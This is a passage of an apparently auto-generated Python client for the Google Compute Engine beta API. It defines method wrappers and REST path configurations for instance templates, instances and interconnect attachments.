config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.instanceTemplates.delete',
ordered_params=[u'project', u'instanceTemplate'],
path_params=[u'instanceTemplate', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/instanceTemplates/{instanceTemplate}',
request_field='',
request_type_name=u'ComputeInstanceTemplatesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified instance template. Gets a list of available instance templates by making a list() request.
Args:
request: (ComputeInstanceTemplatesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceTemplate) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instanceTemplates.get',
ordered_params=[u'project', u'instanceTemplate'],
path_params=[u'instanceTemplate', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/instanceTemplates/{instanceTemplate}',
request_field='',
request_type_name=u'ComputeInstanceTemplatesGetRequest',
response_type_name=u'InstanceTemplate',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an instance template in the specified project using the data that is included in the request. If you are creating a new template to update an existing instance group, your new instance template must use the same network or, if applicable, the same subnetwork as the original template.
Args:
request: (ComputeInstanceTemplatesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceTemplates.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/instanceTemplates',
request_field=u'instanceTemplate',
request_type_name=u'ComputeInstanceTemplatesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of instance templates that are contained within the specified project and zone.
Args:
request: (ComputeInstanceTemplatesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceTemplateList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instanceTemplates.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/instanceTemplates',
request_field='',
request_type_name=u'ComputeInstanceTemplatesListRequest',
response_type_name=u'InstanceTemplateList',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeInstanceTemplatesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceTemplates.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/instanceTemplates/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeInstanceTemplatesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class InstancesService(base_api.BaseApiService):
"""Service class for the instances resource."""
_NAME = u'instances'
def __init__(self, client):
super(ComputeBeta.InstancesService, self).__init__(client)
self._upload_configs = {
}
def AddAccessConfig(self, request, global_params=None):
"""Adds an access config to an instance's network interface.
Args:
request: (ComputeInstancesAddAccessConfigRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AddAccessConfig')
return self._RunMethod(
config, request, global_params=global_params)
AddAccessConfig.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.addAccessConfig',
ordered_params=[u'project', u'zone', u'instance', u'networkInterface'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'networkInterface', u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/addAccessConfig',
request_field=u'accessConfig',
request_type_name=u'ComputeInstancesAddAccessConfigRequest',
response_type_name=u'Operation',
supports_download=False,
)
def AggregatedList(self, request, global_params=None):
"""Retrieves aggregated list of instances.
Args:
request: (ComputeInstancesAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instances.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/instances',
request_field='',
request_type_name=u'ComputeInstancesAggregatedListRequest',
response_type_name=u'InstanceAggregatedList',
supports_download=False,
)
def AttachDisk(self, request, global_params=None):
"""Attaches an existing Disk resource to an instance. You must first create the disk before you can attach it. It is not possible to create and attach a disk at the same time. For more information, read Adding a persistent disk to your instance.
Args:
request: (ComputeInstancesAttachDiskRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AttachDisk')
return self._RunMethod(
config, request, global_params=global_params)
AttachDisk.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.attachDisk',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'forceAttach', u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/attachDisk',
request_field=u'attachedDisk',
request_type_name=u'ComputeInstancesAttachDiskRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified Instance resource. For more information, see Stopping or Deleting an Instance.
Args:
request: (ComputeInstancesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.instances.delete',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}',
request_field='',
request_type_name=u'ComputeInstancesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def DeleteAccessConfig(self, request, global_params=None):
"""Deletes an access config from an instance's network interface.
Args:
request: (ComputeInstancesDeleteAccessConfigRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('DeleteAccessConfig')
return self._RunMethod(
config, request, global_params=global_params)
DeleteAccessConfig.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.deleteAccessConfig',
ordered_params=[u'project', u'zone', u'instance', u'accessConfig', u'networkInterface'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'accessConfig', u'networkInterface', u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/deleteAccessConfig',
request_field='',
request_type_name=u'ComputeInstancesDeleteAccessConfigRequest',
response_type_name=u'Operation',
supports_download=False,
)
def DetachDisk(self, request, global_params=None):
"""Detaches a disk from an instance.
Args:
request: (ComputeInstancesDetachDiskRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('DetachDisk')
return self._RunMethod(
config, request, global_params=global_params)
DetachDisk.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.detachDisk',
ordered_params=[u'project', u'zone', u'instance', u'deviceName'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'deviceName', u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/detachDisk',
request_field='',
request_type_name=u'ComputeInstancesDetachDiskRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified Instance resource. Get a list of available instances by making a list() request.
Args:
request: (ComputeInstancesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Instance) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instances.get',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}',
request_field='',
request_type_name=u'ComputeInstancesGetRequest',
response_type_name=u'Instance',
supports_download=False,
)
def GetSerialPortOutput(self, request, global_params=None):
"""Returns the specified instance's serial port output.
Args:
request: (ComputeInstancesGetSerialPortOutputRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SerialPortOutput) The response message.
"""
config = self.GetMethodConfig('GetSerialPortOutput')
return self._RunMethod(
config, request, global_params=global_params)
GetSerialPortOutput.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instances.getSerialPortOutput',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'port', u'start'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/serialPort',
request_field='',
request_type_name=u'ComputeInstancesGetSerialPortOutputRequest',
response_type_name=u'SerialPortOutput',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an instance resource in the specified project using the data included in the request.
Args:
request: (ComputeInstancesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.insert',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'requestId', u'sourceInstanceTemplate'],
relative_path=u'projects/{project}/zones/{zone}/instances',
request_field=u'instance',
request_type_name=u'ComputeInstancesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of instances contained within the specified zone.
Args:
request: (ComputeInstancesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instances.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/instances',
request_field='',
request_type_name=u'ComputeInstancesListRequest',
response_type_name=u'InstanceList',
supports_download=False,
)
def ListReferrers(self, request, global_params=None):
"""Retrieves the list of referrers to instances contained within the specified zone.
Args:
request: (ComputeInstancesListReferrersRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceListReferrers) The response message.
"""
config = self.GetMethodConfig('ListReferrers')
return self._RunMethod(
config, request, global_params=global_params)
ListReferrers.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instances.listReferrers',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/referrers',
request_field='',
request_type_name=u'ComputeInstancesListReferrersRequest',
response_type_name=u'InstanceListReferrers',
supports_download=False,
)
def Reset(self, request, global_params=None):
"""Performs a reset on the instance. For more information, see Resetting an instance.
Args:
request: (ComputeInstancesResetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Reset')
return self._RunMethod(
config, request, global_params=global_params)
Reset.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.reset',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/reset',
request_field='',
request_type_name=u'ComputeInstancesResetRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetDeletionProtection(self, request, global_params=None):
"""Sets deletion protection on the instance.
Args:
request: (ComputeInstancesSetDeletionProtectionRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetDeletionProtection')
return self._RunMethod(
config, request, global_params=global_params)
SetDeletionProtection.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setDeletionProtection',
ordered_params=[u'project', u'zone', u'resource'],
path_params=[u'project', u'resource', u'zone'],
query_params=[u'deletionProtection', u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{resource}/setDeletionProtection',
request_field='',
request_type_name=u'ComputeInstancesSetDeletionProtectionRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetDiskAutoDelete(self, request, global_params=None):
"""Sets the auto-delete flag for a disk attached to an instance.
Args:
request: (ComputeInstancesSetDiskAutoDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetDiskAutoDelete')
return self._RunMethod(
config, request, global_params=global_params)
SetDiskAutoDelete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setDiskAutoDelete',
ordered_params=[u'project', u'zone', u'instance', u'autoDelete', u'deviceName'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'autoDelete', u'deviceName', u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setDiskAutoDelete',
request_field='',
request_type_name=u'ComputeInstancesSetDiskAutoDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets labels on an instance. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeInstancesSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setLabels',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setLabels',
request_field=u'instancesSetLabelsRequest',
request_type_name=u'ComputeInstancesSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetMachineResources(self, request, global_params=None):
"""Changes the number and/or type of accelerator for a stopped instance to the values specified in the request.
Args:
request: (ComputeInstancesSetMachineResourcesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetMachineResources')
return self._RunMethod(
config, request, global_params=global_params)
SetMachineResources.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setMachineResources',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setMachineResources',
request_field=u'instancesSetMachineResourcesRequest',
request_type_name=u'ComputeInstancesSetMachineResourcesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetMachineType(self, request, global_params=None):
"""Changes the machine type for a stopped instance to the machine type specified in the request.
Args:
request: (ComputeInstancesSetMachineTypeRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetMachineType')
return self._RunMethod(
config, request, global_params=global_params)
SetMachineType.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setMachineType',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setMachineType',
request_field=u'instancesSetMachineTypeRequest',
request_type_name=u'ComputeInstancesSetMachineTypeRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetMetadata(self, request, global_params=None):
"""Sets metadata for the specified instance to the data included in the request.
Args:
request: (ComputeInstancesSetMetadataRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetMetadata')
return self._RunMethod(
config, request, global_params=global_params)
SetMetadata.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setMetadata',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setMetadata',
request_field=u'metadata',
request_type_name=u'ComputeInstancesSetMetadataRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetMinCpuPlatform(self, request, global_params=None):
"""Changes the minimum CPU platform that this instance should use. This method can only be called on a stopped instance. For more information, read Specifying a Minimum CPU Platform.
Args:
request: (ComputeInstancesSetMinCpuPlatformRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetMinCpuPlatform')
return self._RunMethod(
config, request, global_params=global_params)
SetMinCpuPlatform.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setMinCpuPlatform',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setMinCpuPlatform',
request_field=u'instancesSetMinCpuPlatformRequest',
request_type_name=u'ComputeInstancesSetMinCpuPlatformRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetScheduling(self, request, global_params=None):
"""Sets an instance's scheduling options.
Args:
request: (ComputeInstancesSetSchedulingRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetScheduling')
return self._RunMethod(
config, request, global_params=global_params)
SetScheduling.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setScheduling',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setScheduling',
request_field=u'scheduling',
request_type_name=u'ComputeInstancesSetSchedulingRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetServiceAccount(self, request, global_params=None):
"""Sets the service account on the instance. For more information, read Changing the service account and access scopes for an instance.
Args:
request: (ComputeInstancesSetServiceAccountRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetServiceAccount')
return self._RunMethod(
config, request, global_params=global_params)
SetServiceAccount.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setServiceAccount',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setServiceAccount',
request_field=u'instancesSetServiceAccountRequest',
request_type_name=u'ComputeInstancesSetServiceAccountRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetTags(self, request, global_params=None):
"""Sets tags for the specified instance to the data included in the request.
Args:
request: (ComputeInstancesSetTagsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetTags')
return self._RunMethod(
config, request, global_params=global_params)
SetTags.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setTags',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setTags',
request_field=u'tags',
request_type_name=u'ComputeInstancesSetTagsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SimulateMaintenanceEvent(self, request, global_params=None):
"""Simulates a maintenance event on the instance.
Args:
request: (ComputeInstancesSimulateMaintenanceEventRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SimulateMaintenanceEvent')
return self._RunMethod(
config, request, global_params=global_params)
SimulateMaintenanceEvent.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.simulateMaintenanceEvent',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/simulateMaintenanceEvent',
request_field='',
request_type_name=u'ComputeInstancesSimulateMaintenanceEventRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Start(self, request, global_params=None):
"""Starts an instance that was stopped using the using the instances().stop method. For more information, see Restart an instance.
Args:
request: (ComputeInstancesStartRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Start')
return self._RunMethod(
config, request, global_params=global_params)
Start.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.start',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/start',
request_field='',
request_type_name=u'ComputeInstancesStartRequest',
response_type_name=u'Operation',
supports_download=False,
)
def StartWithEncryptionKey(self, request, global_params=None):
"""Starts an instance that was stopped using the using the instances().stop method. For more information, see Restart an instance.
Args:
request: (ComputeInstancesStartWithEncryptionKeyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('StartWithEncryptionKey')
return self._RunMethod(
config, request, global_params=global_params)
StartWithEncryptionKey.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.startWithEncryptionKey',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/startWithEncryptionKey',
request_field=u'instancesStartWithEncryptionKeyRequest',
request_type_name=u'ComputeInstancesStartWithEncryptionKeyRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Stop(self, request, global_params=None):
"""Stops a running instance, shutting it down cleanly, and allows you to restart the instance at a later time. Stopped instances do not incur VM usage charges while they are stopped. However, resources that the VM is using, such as persistent disks and static IP addresses, will continue to be charged until they are deleted. For more information, see Stopping an instance.
Args:
request: (ComputeInstancesStopRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Stop')
return self._RunMethod(
config, request, global_params=global_params)
Stop.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.stop',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/stop',
request_field='',
request_type_name=u'ComputeInstancesStopRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeInstancesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.testIamPermissions',
ordered_params=[u'project', u'zone', u'resource'],
path_params=[u'project', u'resource', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeInstancesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
def UpdateAccessConfig(self, request, global_params=None):
"""Updates the specified access config from an instance's network interface with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeInstancesUpdateAccessConfigRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('UpdateAccessConfig')
return self._RunMethod(
config, request, global_params=global_params)
UpdateAccessConfig.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.updateAccessConfig',
ordered_params=[u'project', u'zone', u'instance', u'networkInterface'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'networkInterface', u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/updateAccessConfig',
request_field=u'accessConfig',
request_type_name=u'ComputeInstancesUpdateAccessConfigRequest',
response_type_name=u'Operation',
supports_download=False,
)
def UpdateNetworkInterface(self, request, global_params=None):
"""Updates an instance's network interface. This method follows PATCH semantics.
Args:
request: (ComputeInstancesUpdateNetworkInterfaceRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('UpdateNetworkInterface')
return self._RunMethod(
config, request, global_params=global_params)
UpdateNetworkInterface.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.instances.updateNetworkInterface',
ordered_params=[u'project', u'zone', u'instance', u'networkInterface'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'networkInterface', u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/updateNetworkInterface',
request_field=u'networkInterfaceResource',
request_type_name=u'ComputeInstancesUpdateNetworkInterfaceRequest',
response_type_name=u'Operation',
supports_download=False,
)
class InterconnectAttachmentsService(base_api.BaseApiService):
"""Service class for the interconnectAttachments resource."""
_NAME = u'interconnectAttachments'
def __init__(self, client):
super(ComputeBeta.InterconnectAttachmentsService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of interconnect attachments.
Args:
request: (ComputeInterconnectAttachmentsAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InterconnectAttachmentAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.interconnectAttachments.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/interconnectAttachments',
request_field='',
request_type_name=u'ComputeInterconnectAttachmentsAggregatedListRequest',
response_type_name=u'InterconnectAttachmentAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified interconnect attachment.
Args:
request: (ComputeInterconnectAttachmentsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.interconnectAttachments.delete',
ordered_params=[u'project', u'region', u'interconnectAttachment'],
path_params=[u'interconnectAttachment', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/interconnectAttachments/{interconnectAttachment}',
request_field='',
request_type_name=u'ComputeInterconnectAttachmentsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified interconnect attachment.
Args:
request: (ComputeInterconnectAttachmentsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InterconnectAttachment) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.interconnectAttachments.get',
ordered_params=[u'project', u'region', u'interconnectAttachment'],
path_params=[u'interconnectAttachment', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/interconnectAttachments/{interconnectAttachment}',
request_field='',
request_type_name=u'ComputeInterconnectAttachmentsGetRequest',
response_type_name=u'InterconnectAttachment',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an InterconnectAttachment in the specified project using the data included in the request.
Args:
request: (ComputeInterconnectAttachmentsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.interconnectAttachments.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/interconnectAttachments',
request_field=u'interconnectAttachment',
request_type_name=u'ComputeInterconnectAttachmentsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of interconnect attachments contained within the specified region.
Args:
request: (ComputeInterconnectAttachmentsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InterconnectAttachmentList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
